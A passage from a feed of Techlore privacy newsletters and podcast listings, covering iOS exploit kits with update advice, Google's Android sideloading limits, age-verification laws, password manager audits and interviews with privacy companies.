security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-49.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260328-CAPE-INTERVIEW-thumbnail-v1-1.jpg)](https://techlore.tech/cell-phone-privacy-triangulation-sim-swaps-imsi-catchers-more-cape-interview/) --- ## Action Item ✅ If you're running an Apple device, check your iOS version right now: **Settings → General → About → iOS Version**. If you're on anything between iOS 18.4 and 18.7.2, your device is actively vulnerable to DarkSword exploits that are now freely available to anyone. Update to iOS 26.3.1 or later (or iOS 18.7.3+ if your device doesn't support iOS 26). If you are at a higher risk, consider enabling lockdown mode. ### Coruna and DarkSword iOS Exploits Explained: What iPhone Users Need to Do Right Now URL: https://techlore.tech/coruna-and-darksword-ios-exploits-explained-what-iphone-users-need-to-do-right-now/ Last updated: 2026-04-07T23:22:24.000Z This week's Surveillance Report covers a major iOS exploit kit found in the wild targeting hundreds of millions of iPhones, Google's controversial Android sideloading crackdown threatening alternative app stores, Instagram quietly killing E2EE in DMs, Colorado's push to mandate age verification at the OS level (and what it means for open source), and a historic EU Parliament vote to end mass Chat Control scanning — plus a packed Defense Bulletin with the Proton/FBI story, FBI location data purchases, rogue AI at Meta, and a ton of updates. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 INTRO TO SURVEILLANCE REPORT 01:30 HIGHLIGHT STORY: IOS EXPLOITS 08:02 GOOGLE SIDELOADING ADVANCED FLOW 19:26 INSTAGRAM REMOVING E2EE 22:26 OS AGE VERIFICATION 28:44 EU CHAT CONTROL 31:00 DEFENSE BULLETIN #### Episode Sources ****Highlight: Millions of iPhones Targeted by Coruna Exploit Kit** - - - - ****Story 1: Google Locks Down Android Sideloading** - - - - ****Story 2: Instagram Kills End-to-End Encryption in DMs** - - ****Story 3: Colorado Pushes Age Verification at the OS Level** - - - - - - ****Story 4: EU Parliament Votes to End Chat Control Mass Scanning** - - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Telecom Insider Explains What Your Carrier Actually Sees (Cape Interview) URL: https://techlore.tech/telecom-insider-explains-what-your-carrier-actually-sees-cape-interview/ Last updated: 2026-04-09T19:14:53.000Z Most people think turning off location services protects them from being tracked. It doesn't. In this interview, David Dunn from privacy-focused cellular provider Cape breaks down what carriers actually collect, how threats like IMSI catchers and SIM swaps work, and how Cape is building a mobile network specifically designed to minimize that exposure. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:01 WHAT CELLULAR CARRIERS SEE 00:02:50 THE CONCERNS 00:04:08 ABUSE OF DATA 00:05:28 LTT SIM SWAP ATTACK 00:06:33 PHONE CALL BEHIND-THE-SCENES 00:12:24 CELL TOWER TRIANGULATION & GEOFENCING 00:15:32 LOCATION SERVICES 00:16:25 CALL DATA & SMS RECORDS 00:19:24 SMS VS. EMAIL SECURITY 00:20:23 SIM SWAPPING + IMSI CATCHERS 00:24:09 CELL TOWER TRIANGULATION + GEOFENCING SOLUTIONS 00:26:38 CALL DATA RECORD + SMS SOLUTIONS 00:28:48 WI-FI CALLING 00:30:54 SS7 SIGNALING ATTACK PROTECTION 00:32:25 4G VS. 5G PRIVACY 00:36:34 USER AGENTS + CUSTOM ROMS 00:42:15 DEVICE PROTECTION 00:46:06 CAPE'S APPROACH 00:55:01 MOBILE CORE 00:59:18 CDR DELETION 01:00:06 IMSI ROTATION 01:00:52 OTHER USER CONFIGURABLE OPTIONS 01:04:05 PHONE NUMBER REPUTATION 01:05:29 ISSUES WITH PRIVACY TOOLS 01:08:22 OBSCURA 01:10:48 REGISTRATION 01:13:04 TRUST & VERIFICATION 01:15:37 COMPATIBILITY 01:17:33 AVAILABILITY 01:17:54 ROAMING 01:18:36 LAW ENFORCEMENT REQUESTS 01:21:15 PALANTIR 01:23:25 PROTON PARTNERSHIP 01:25:05 WHO IS CAPE FOR? 01:26:43 TELL US SOMETHING SHOCKING 01:29:28 OUTRO #### Episode Sources • Cape: https://www.cape.co • Cape + Proton collab: https://www.cape.co/cape-and-proton ### Google Is Closing the Last Door on Android Freedom | March 03-22 URL: https://techlore.tech/google-is-closing-the-last-door-on-android-freedom-march-03-22/ Last updated: 2026-03-23T20:06:58.000Z # On Our Radar 🎯 [**Google's War on Sideloading Is a Digital Rights Problem, Not Just an Android One**](https://arstechnica.com/gadgets/2026/03/google-details-new-24-hour-process-to-sideload-unverified-android-apps/) Google has announced a new 24-hour developer verification process for sideloading unverified apps on Android. (aka, installing any application away from Google's own Play Store.) It's being framed as a 'security' improvement, but the implications go well beyond keeping malware off your phone. The quick summary: users must enable developer options, wait 24 hours, and jump through extra hoops before installing anything outside the Play Store. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/03/image.png) [F-Droid](https://f-droid.org/), the open-source alternative app store that's been a cornerstone of software freedom for years is calling it an existential threat. This new policy creates friction specifically around the apps that exist *outside* Google's control, the ones that don't monetize your data, the ones that give you genuine ownership over what runs on your device. Meanwhile, apps distributed through the Play Store sail through without any changes. This is a pattern we've seen before with Apple who perfected it: take something that sounds reasonable on its face: "we're protecting users from bad actors"...and use it to quietly consolidate control over the entire software ecosystem. Google spent years positioning Android as the "open" alternative to iOS. That positioning is getting harder to defend. When a 24-hour verification gate can determine whether an app can even be installed, openness is just a marketing claim. We wish Google would come forward and admit they don't want an open ecosystem, or actually keep it open. We want to remind you that this news comes in light of: - **The Epic verdict fallout:** A U.S. jury ruled in December 2023 that Google maintained an illegal monopoly over Android app distribution. A September 2024 court order required Google to allow sideloading and third-party app stores. Now, just a year later, Google is rolling out developer verification mandates that critics say directly undermine that ruling. Make of that what you will. - **AOSP releases cut from quarterly to biannual:** Starting in 2026, Google moved from quarterly to twice-yearly AOSP drops. Top OEMs like Samsung still get early private access. Everyone else, including open-source forks and smaller manufacturers has to wait. - **The AOSP main branch went read-only:** In March 2025, Google froze the main AOSP development branch, directing contributors to a "stable releases only" workflow. Less community contribution, more Google-controlled pipeline. - **Key features quietly moving to proprietary Play Services:** Push notifications, location refinements, AI features, security tools and more capabilities that used to live in AOSP have been migrated to Google Mobile Services, which is closed, certified, and unavailable to independent forks. Here's why this matters even if you've never touched F-Droid: your ability to use privacy tools, security tools, and apps that don't answer to ad-funded platforms depends on software freedom. Privacy and security can't fully exist without the ability to choose what runs on your device. Sideloading is the last real escape valve on Android. Closing it doesn't make you safer, it makes you more dependent on Google—*which as we know has a tendency to host its own malware on the Play Store too, like* [*here*](https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/)*, or* [*here*](https://securelist.com/necro-trojan-is-back-on-google-play/113881/)*, or* [*here*](https://www.bleepingcomputer.com/news/security/malicious-android-apps-with-19m-installs-removed-from-google-play/) *or* [*here*](https://www.bleepingcomputer.com/news/security/malicious-android-apps-on-google-play-downloaded-42-million-times/)*.* **What you can do:** Explore [F-Droid](https://f-droid.org/en/) as an alternative app source, consider switching to a privacy-respecting Android fork, and more importantly–**make some noise!** [Keep Android Open](https://keepandroidopen.org/) includes countless ways to get involved, which you should all be doing! --- ## Bits & Bytes 🤖 [**\~ Proton Helped the FBI Unmask a Protestor**](https://www.404media.co/proton-mail-helped-fbi-unmask-anonymous-stop-cop-city-protestor/) Under Swiss legal process, Proton handed over payment metadata that helped the FBI identify an individual. No message content was involved, but account payment data was handed over. **Our take:** This isn't necessarily a betrayal story, it's a threat modeling lesson. Privacy and anonymity are different things, and they require different tools. If your threat model includes government adversaries, your setup needs to reflect that from the start. If this concerns your threat model, pay with cash or cryptocurrency privately‚ both of which Proton natively supports. [**\~ Instagram Is Killing E2EE in DMs**](https://www.wired.com/story/the-danger-behind-metas-decision-to-kill-end-to-end-encrypted-instagram-dms/) Meta is quietly removing end-to-end encryption from Instagram direct messages, rolling back a feature they only recently extended to hundreds of millions of users. **Our take:** Meta's privacy features have always been reversible and PR-driven. They get added when there's regulatory or PR pressure, and they disappear when that pressure fades. If your private conversations matter, use Signal or another E2EE messenger from [our resources](https://privacytools.techlore.tech/#messengers). Our broader concern is if this represents the first domino falling (in a so-far united front) from the big tech companies who have broadly supported E2EE. [**\~ EU Parliament Votes to End Chat Control Mass Scanning**](https://www.patrick-breyer.de/en/historic-chat-control-vote-in-the-eu-parliament-meps-vote-to-end-untargeted-mass-scanning-of-private-chats/) On March 11, the EU Parliament passed a meaningful amendment to the Child Sexual Abuse Regulation, restricting private message scanning to judicially-targeted suspects only, a direct rejection of the bulk surveillance approach that's been on the table for years. **Our take:** A genuine win worth celebrating! That said, the Commission and most Council members are still pushing for broader scanning powers. [Fight Chat Control](https://fightchatcontrol.eu/) is still live for a reason, don't stop fighting just yet. --- ## This Week on Techlore 📺 **We hit 300,000 subscribers 🎂** Thank you everyone! None of this happens without the people who watch, share, and support the work. The best part? We were actually together in person when it happened, on a work retreat for a project many of you have been waiting on. More on that for a future blog. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/03/IMG_9603.jpeg) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/03/IMG_9604.jpeg) On Techlore Talks, we had Artyom Zorin, co-founder of ZorinOS to discuss their Linux distribution and why people are finally ditching Microsoft services: [Why This Linux Distro Is Growing Faster Than Ever (Zorin OS Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-47.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260321-ZORIN-INTERVIEW-thumbnail-v1.jpg)](https://techlore.tech/why-this-linux-distro-is-growing-faster-than-ever-zorin-os-interview/) **Surveillance Report 258, dropping very soon** This SR episode covers the Coruna iOS exploit kit targeting hundreds of millions of iPhones, Instagram's E2EE removal, the EU Chat Control vote, and a packed Defense Bulletin. **Friday Livestream is back ✅** We missed you all last week! We were playing catch-up after the retreat and a bit of illness hit the team. Come hang out, ask questions, and we're excited to be back. Keep an eye out for a public stream scheduled for Friday. Thank you all for your patience, we've had a busy couple weeks away from our normal workflows, so this week we're getting back into the swing of our normal work. I promise it's for something big 😄 Additionally, our [tools](https://privacytools.techlore.tech/) are currently being revamped to better integrate with our main website. --- ## Action Item ✅ Privacy doesn't exist in a vacuum. Security tools only reach you if you're free to install them. These aren't separate fights, they're the same fight from different angles. Understanding that connection is what turns someone who cares about privacy into someone who can actually defend it. Start with your own Android setup, explore the relationships on your other devices, and help fight for the cause on [Keep Android Open.](https://keepandroidopen.org/) ### Why This Linux Distro Is Growing Faster Than Ever (Zorin OS Interview) URL: https://techlore.tech/why-this-linux-distro-is-growing-faster-than-ever-zorin-os-interview/ Last updated: 2026-04-07T23:26:08.000Z Artyom Zorin, co-founder and lead developer of Zorin OS, explains why this Linux distribution is seeing explosive growth, its user-friendly approach, business models & incentives, privacy, open source, and more. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:02:55 ZORIN OS VS. UBUNTU 00:04:14 PACKAGE COMPATIBILITY 00:07:01 OPEN SOURCE? FREE? 00:11:46 BUSINESS MODELS + INCENTIVES 00:14:48 TARGET DEMOGRAPHIC 00:16:00 PRIVACY BY DEFAULT 00:17:51 SECURITY MODEL 00:19:48 WHY UBUNTU? 00:21:16 DESKTOP ENVIRONMENTS 00:25:03 RELEASE SCHEDULE 00:26:26 COMPATABILITY LAYERS 00:28:52 ARM SUPPORT 00:32:32 PROFESSIONAL +CREATIVE SOFTWARE 00:36:43 DEFAULT APP CHOICES 00:39:19 ZORIN GRID 00:42:22 ZORIN EDUCATION 00:43:35 DEVICES + INSTALLATION 00:47:50 ZORIN OS LIMITATIONS 00:50:26 DUAL BOOT 00:51:30 THE ZORIN TEAM 00:52:58 LOCATION 00:53:12 OPEN SOURCE + GIVING BACK 00:56:24 DOWNLOADS 00:59:17 WINDOWS 10 01:01:09 AI 01:07:23 THE FUTURE OF ZORIN OS 01:09:49 MOBILE DEVICES? 01:10:35 HOW TO FOLLOW 01:11:18 OUTRO #### Episode Sources - Zorin OS: https://zorin.com - Zorin OS Pro: https://zorin.com/os/pro/ - Zorin OS Education: https://zorin.com/os/education/ ### Your OS Must Now Report Your Age to Every App URL: https://techlore.tech/your-os-must-now-report-your-age-to-every-app/ Last updated: 2026-03-12T00:39:00.000Z California passed a law forcing operating systems to track your age and report it to every app you use. It takes effect January 1, 2027, and applies to \*EVERY\* operating system. Colorado, Illinois, Louisiana, New York, Texas, and Utah have similar bills pending. Here's what's happening and what you can do. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Browser Tier List: Brave, Firefox, Chrome, Tor, & More (2026 Tier List) URL: https://techlore.tech/browser-tier-list-brave-firefox-chrome-tor-more-2026-tier-list/ Last updated: 2026-03-04T19:25:46.000Z "Just use Tor!" - or don't. In this 2026 tier list, Henry ranks Brave, Firefox, LibreWolf, Chromite, Edge, Vivaldi, and more. Much more subjective than the Linux tier list, so let us know where you disagree, and enjoy! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Can You Trust Your Password Manager? | Feb 24-Mar 2 URL: https://techlore.tech/can-you-trust-your-password-manager-feb-24-mar-2/ Last updated: 2026-03-02T23:15:32.000Z ## On Our Radar 🎯 [**Your Password Manager Might Not Be as Trustless as You Think**](https://arstechnica.com/security/2026/02/password-managers-promise-that-they-cant-see-your-vaults-isnt-always-true/) We put an immense amount of trust in password managers. The #1 selling point is zero-knowledge: the company can't see your passwords – only you can. But new research pulls back the curtain on how that promise holds up in practice. The answer: not as well as advertised. [Researchers analyzed](https://arstechnica.com/security/2026/02/password-managers-promise-that-they-cant-see-your-vaults-isnt-always-true/) several major password managers (LastPass, Dashlane, and Bitwarden) and found the "zero-knowledge" claim is more marketing than cryptographic guarantee. The issue isn't that these companies are malicious — it's that architectural decisions made for convenience (like account recovery, password sharing, and legacy compatibility) expand the attack surface. Every service tested had meaningful vulnerabilities. What differed was severity and company response. This matters because password managers are high-value targets. If someone can breach a provider and the architecture isn't truly zero-knowledge, your entire digital life is exposed in one sweep — particularly when features like account recovery or vault sharing are enabled. This research doesn't mean you should stop using a password manager. It means you should know what you're actually trusting them with, and which features might be better left disabled. [KeePass](https://keepass.info/)\-style local vaults remain the gold standard for removing the need for trust altogether. However, not everyone wants to (or should) use an offline password manager, and a cloud-based solution is still far better than reusing weak passwords. For reference, [Bitwarden](https://bitwarden.com/)'s audit is publicly available, while [1Password](https://1password.com/) (briefly mentioned in the research) proactively documented their own limitations before being studied. **What you can do:** Check whether your password manager has published an audit that specifically validates their "zero-knowledge" architecture. If they haven't, or if you're using a closed source service without verifiable claims, take that into account. Make sure you're always running the latest version. Also look at how each company responds to these types of incidents. Are they dismissive? Responsive? Transparent? If they won't take genuine responsibility in public, there's a good chance they won't do it in private, either. --- ## Bits & Bytes 🤖 **\~** [**Google's Android Developer Verification Plan Threatens the Open App Ecosystem**](https://www.theregister.com/2026/02/24/google%5Fandroid%5Fdeveloper%5Fverification%5Fplan) Google announced last year that all Android apps must be tied to a verified developer account, including those distributed outside the Play Store. F-Droid and the broader open-source Android ecosystem have sounded the alarm, and Techlore was a signatory on the Keep Android Open letter pushing back. **Our take:** This is a slow squeeze on sideloading and open distribution dressed up as safety. If verified identities become a hard requirement, anonymous and pseudonymous developers — the backbone of privacy-focused FOSS tools — get pushed out. Watch this one carefully. **\~** [**Apple Rolls Out Age Verification Tools Worldwide**](https://techcrunch.com/2026/02/24/apple-rolls-out-age-verification-tools-worldwide-to-comply-with-growing-web-of-child-safety-laws/) Apple quietly launched a global age verification system this week to help app developers comply with a growing patchwork of child safety laws. They are also now blocking downloads of 18+ apps in Australia, Brazil, and Singapore until users confirm their age. **Our take:** Age verification sounds reasonable until you think about the data trail it creates. Apple's approach is arguably one of the more privacy-conscious implementations possible — sharing an age range rather than identity details, like birthdays. But the real concern isn't Apple's implementation; it's the legislative pressure underneath it. **\~** [**Android Mental Health Apps with 14.7 Million Installs Are Full of Security Flaws**](https://www.bleepingcomputer.com/news/security/android-mental-health-apps-with-147m-installs-filled-with-security-flaws/) Researchers analyzed ten Android mental health apps with a combined 14.7 million downloads and found 1,575 security vulnerabilities across them. **Our take:** Mental health data is uniquely exploitable. The combination of sensitive content, a trusting user base, and apparently lax security practices is a serious problem. Since the app names aren't public yet, the best thing you can do is check when your mental health app(s) last received an update. If it's been sitting untouched for over a year, that's something to think about. --- ## This Week on Techlore 📺 This week's Surveillance Report dives deep into the password manager research, Google's plans to close off Android, Apple's age verification expansion, and a massive Defense Bulletin packed with breaches and critical service updates: [Password Manager Vaults Aren’t Private, Google Threatens Open Android, & Apple’s Global Age Verification | SR257Techlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-43.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report-2.jpg)](https://techlore.tech/password-manager-vaults-arent-private-google-threatens-open-android-apples-global-age-verification-sr257/) On Techlore Talks, we had JP Schmetz, founder of Brave Search and CEO of Ghostery, to discuss making trackers visible and reinventing the open web with AI: [Ghostery CEO Explains How Ad Blockers Work, Why They Break, and the Future of Private SearchTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-45.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260210-GHOSTERY-INTERVIEW-thumbnail-v1-1.jpg)](https://techlore.tech/the-downside-of-ad-blockers-ghostery-ceo-interview/) The widely-circulated narrative that Google already backed down from forcing developer registration is false. They didn't: [Google Is Closing Android. 37 Orgs Are Fighting Back.Almost 40 organizations, including Techlore, published an open letter to Google opposing Android Developer Verification – a program that would require all developers to register with Google before distributing apps on Android. The widely-circulated narrative that Google already backed down from this is false. They didn’t, and that misunderstanding may be![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-46.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v1c.png)](https://techlore.tech/google-is-closing-android-37-orgs-are-fighting-back/) --- ## Action Item ✅ Take 10 minutes to look up whether your password manager has published a third-party cryptographic audit. Search "\[your password manager\] zero-knowledge audit" and see what comes up. If you can't find a clear, verifiable answer — that's your answer. --- ## Quick Note 📝 It's been a hot minute since the last issue of Digital Rights Digest, so we really appreciate the patience as we get our new workflows locked in. Next week Henry & I will be together in person to film Go Incognito V2, but after that trip, we should have the bandwidth to be more consistent. Stay tuned! ### Password Manager Vaults Aren't Private, Google Threatens Open Android, & Apple's Global Age Verification URL: https://techlore.tech/password-manager-vaults-arent-private-google-threatens-open-android-apples-global-age-verification-sr257/ Last updated: 2026-04-07T23:22:12.000Z This week's Surveillance Report covers the truth about password manager vault privacy, Google's threat to the open Android ecosystem, Apple's global age verification rollout, Android mental health apps packed with security flaws, and a massive week of breaches and service updates. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 INTRO 00:55 PASSWORD MANAGER VAULT SECURITY 12:51 ANDROID DEVELOPER VERIFICATION 16:36 APPLE AGE VERIFICATION 21:06 ANDROID MENTAL HEALTH APPS 25:17 DEFENSE BULLETIN #### Episode Sources ****Highlight: Research Shows Password Managers Can Actually See Your Vaults** - https://arstechnica.com/security/2026/02/password-managers-promise-that-they-cant-see-your-vaults-isnt-always-true - https://eprint.iacr.org/2026/058.pdf ****Story 1: Google's Android Developer Verification Plan Threatens the Open App Ecosystem** - https://www.theregister.com/2026/02/24/google\_android\_developer\_verification\_plan - https://floss.social/@fdroidorg/116086115016017602 - https://keepandroidopen.org/open-letter - https://keepandroidopen.org - https://youtu.be/5MZfGq5F1NU ****Story 2: Apple Rolls Out Age Verification Tools Worldwide** - https://techcrunch.com/2026/02/24/apple-rolls-out-age-verification-tools-worldwide-to-comply-with-growing-web-of-child-safety-laws/ ****Story 3: Android Mental Health Apps with 147 Million Installs Are Full of Security Flaws** - https://www.bleepingcomputer.com/news/security/android-mental-health-apps-with-147m-installs-filled-with-security-flaws/ ****The Defense Bulletin** - https://arstechnica.com/security/2026/02/new-airsnitch-attack-breaks-wi-fi-encryption-in-homes-offices-and-enterprises/ - https://www.bleepingcomputer.com/news/security/google-patches-first-chrome-zero-day-exploited-in-attacks-this-year/ - https://www.bleepingcomputer.com/news/security/predator-spyware-hooks-ios-springboard-to-hide-mic-camera-activity/ - https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/ - https://techcrunch.com/2026/02/18/microsoft-says-office-bug-exposed-customers-confidential-emails-to-copilot-ai/ - https://adguard.com/en/blog/youtube-missing-comments-descriptions.html - https://www.bleepingcomputer.com/news/security/european-dyi-chain-manomano-data-breach-impacts-38-million-customers/ - https://www.bleepingcomputer.com/news/security/data-breach-at-french-bank-registry-impacts-12-million-accounts/ - https://techcrunch.com/2026/02/24/cargurus-data-breach-affects-12-5-million-accounts/ - https://alternativeto.net/news/2026/2/paypal-breach-exposed-user-data-six-months-social-security-numbers-and-unauthorized-charges/ - https://www.bleepingcomputer.com/news/security/data-breach-at-fintech-firm-figure-affects-nearly-1-million-accounts/ - https://www.bleepingcomputer.com/news/security/wynn-resorts-confirms-employee-data-breach-after-extortion-threat/ - https://www.bleepingcomputer.com/news/security/university-of-mississippi-medical-center-closes-clinics-after-ransomware-attack/ - https://www.bleepingcomputer.com/news/security/washington-hotel-in-japan-discloses-ransomware-infection-incident/ - Signal releases desktop backups! - https://www.phoronix.com/news/Firefox-148 - https://blog.torproject.org/new-release-tor-browser-1507/ - https://alternativeto.net/news/2026/2/thunderbird-148-0-boosts-mail-reliability-accessibility-and-security/ - https://tuta.com/blog/schedule-send-emails-in-tuta-mail - https://tuta.com/blog/tuta-add-on-in-thunderbird - https://alternativeto.net/news/2026/2/nextcloud-hub-26-winter-adds-migration-tools-browser-encryption-and-office-updates/ - https://nextcloud.com/blog/nextcloud-hub26-winter/ - https://ente.io/blog/locker/ - https://alternativeto.net/news/2026/2/asteroidos-2-0-launches-with-always-on-display-nightstand-mode-and-performance-improvements/ - https://alternativeto.net/news/2026/2/kde-plasma-6-6-adds-virtual-keyboard-spectacle-text-recognition-and-improved-accessibility/ - https://www.theverge.com/tech/884337/samsung-galaxy-s26-ultra-privacy-display-price - https://www.eff.org/deeplinks/2026/02/eff-wisconsin-legislature-vpn-bans-are-still-terrible-idea - https://youtu.be/cuLdd07P1II - https://petition.parliament.uk/petitions/754408 - https://github.com/cake-tech/cake\_wallet/releases/tag/v6.0.0 ### How Ad Blockers Work, Why They Break, and the Future of Private Search (JP Schmetz Interview) URL: https://techlore.tech/how-ad-blockers-work-why-they-break-and-the-future-of-private-search-jp-schmetz-interview/ Last updated: 2026-04-09T19:20:44.000Z Most ad blockers start by blocking everything—then you become tech support for friends & family when pages break. Henry interviewed JP Schmetz, founder of Brave Search and CEO of Ghostery, about making trackers visible, why there are only 3 search indexes in the world, reinventing the open web with AI, and how to avoid becoming "the family CTO." 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:32 ORIGINS WITH GHOSTERY 00:03:15 SEARCH ENGINES + BROWSERS 00:06:32 GHOSTERY'S BROWSER EXTENSION 00:09:09 THE PRIVACY DISCONNECT 00:13:02 REAL WORLD IMPACTS 00:16:03 PRIVACY VARIES BY LOCATION 00:16:47 PAGE BLOCKING + BREAKING 00:24:06 ADAPTATION + TRUST 00:28:48 ROLES AT GHOSTERY + BRAVE 00:29:22 OPEN SOURCE 00:30:38 BRAVE SHIELDS OR GHOSTERY? 00:32:36 SUGGESTED CONFIGURATIONS 00:40:13 WHOTRACKS.ME 00:44:30 WHAT IS A TRACKER? 00:47:39 WHAT ARE THE INCENTIVES? 00:50:31 DOES BLOCKING = NO DATA SHARING? 00:53:50 THE INVESTIGATIVE PROCESS 00:57:27 PRIVATE SEARCH 01:00:11 META SEARCH VS. INDEPENDENT INDEX 01:02:30 CONTEXTUAL VS. TARGETED ADVERTISING 01:06:28 BRAVE SEARCH ADS 01:08:16 INDEXES 01:10:53 AI + SEARCH 01:19:43 WHAT'S NEXT? 01:22:22 PUBLISHING + INCENTIVES + THE FUTURE 01:25:30 HOW TO FOLLOW #### Episode Sources • Ghostery: https://www.ghostery.com/ • Who Tracks Me Database: https://whotracks.me/ • Ghostery Private Search: https://www.ghostery.com/private-search • Brave Search: https://search.brave.com/ ### Google Is Closing Android. 37 Orgs Are Fighting Back. URL: https://techlore.tech/google-is-closing-android-37-orgs-are-fighting-back/ Last updated: 2026-03-02T21:44:43.000Z Almost 40 organizations, including Techlore, published an open letter to Google opposing Android Developer Verification – a program that would require all developers to register with Google before distributing apps on Android. The widely-circulated narrative that Google already backed down from this is false. They didn't, and that misunderstanding may be the most dangerous part of the story right now. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Make the Invisible Visible: The Complete Guide to Block Trackers URL: https://techlore.tech/make-the-invisible-visible-the-complete-guide-to-block-trackers/ Last updated: 2026-02-25T18:40:36.000Z You may think you're just being tracked by a handful of companies, but the reality is your data is sent to countless different trackers before you can finish reading a news headline. This video breaks down three layers of protection to keep yourself safe online. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Mac Hit by 3 Simultaneous Attacks, Discord's Age Verification Fails, & Google's "Deleted" Footage Returns | SR256 URL: https://techlore.tech/mac-hit-by-3-simultaneous-attacks-discords-age-verification-fails-googles-deleted-footage-returns-sr256/ Last updated: 2026-04-07T23:21:56.000Z No operating system is safe, and this week, Mac users got hit from three directions at once. We cover the attacks, Discord's messy age verification expansion, hidden hotel cameras in China, and everything else threatening your digital rights. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 INTRO 01:00 MACOS ATTACKS 13:12 DISCORD AGE VERIFICATION 23:34 MORE AGE VERIFICATION 26:08 GOOGLE NEST FOOTAGE MYSTERY 30:56 DEFENSE BULLETIN #### Episode Sources ****Highlight - macOS Attacks** - - - ****Discord Age Verification** - - - - - ****Age Verification Keeps Spreading** - - - ****Google Recovers "Deleted" Nest Video for FBI** - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Why This Password Manager Requires a Private Key (Passbolt Interview) URL: https://techlore.tech/why-this-password-manager-requires-a-private-key-passbolt-interview/ Last updated: 